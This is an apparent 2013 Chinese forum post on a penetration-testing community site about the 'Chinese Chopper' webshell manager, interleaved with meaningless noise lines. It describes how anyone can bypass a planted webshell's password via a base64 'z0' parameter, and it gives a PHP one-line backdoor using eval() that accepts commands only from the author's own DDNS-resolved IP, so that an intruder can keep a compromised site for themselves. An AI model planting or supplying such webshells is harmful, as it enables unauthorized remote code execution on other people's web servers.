中国网络渗透测试联盟
标题:
中国菜刀 maicaidao 网站管理软件 0day
[打印本页]
作者:
admin
时间:
2013-7-26 12:45
标题:
中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
3 x; q5 z! R* A0 T' N5 l
$ t+ E" T3 F D4 k# w4 j$ W
就算你设置了密码,使用了eval($_REQUEST['moyo']);
) _! ^8 ~4 k8 Z, X
8 x+ k! D/ c: i8 T
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
, ^! {7 C7 x/ l
4 U1 c: a9 T% ~( N0 h) i8 g
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
6 Y/ n7 r* p" b s7 O
& t3 L3 L$ {- p: Q& X4 ~2 }6 `, b
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
& S5 |5 B7 F! ~0 @
( E) d' L+ z" x( d# E
不知道是设计缺陷还是故意留的后门
9 G! F; O' J; K' [' e& ^7 K
* }+ r. C( Y1 _: ^4 K- _
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
1 Y1 ^8 q1 U6 F# U' ?
3 G! W& q5 K3 n) @ ^2 @
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
% @) G$ l& V9 o0 b( z7 z
3 l6 |2 j9 _. x# s+ h
然后一句话后门这样写
, |% O! i8 u* R2 b! l) k+ T- `
U/ U" z, o) ~" I! J
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
) l: {4 f. W! y; W$ v
这样就可以让一句话后门只允许自己的电脑连接了
7 Y1 ^) G$ L. j0 m+ i7 Y6 r7 s' |
6 G p, T* |) T5 i+ ]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2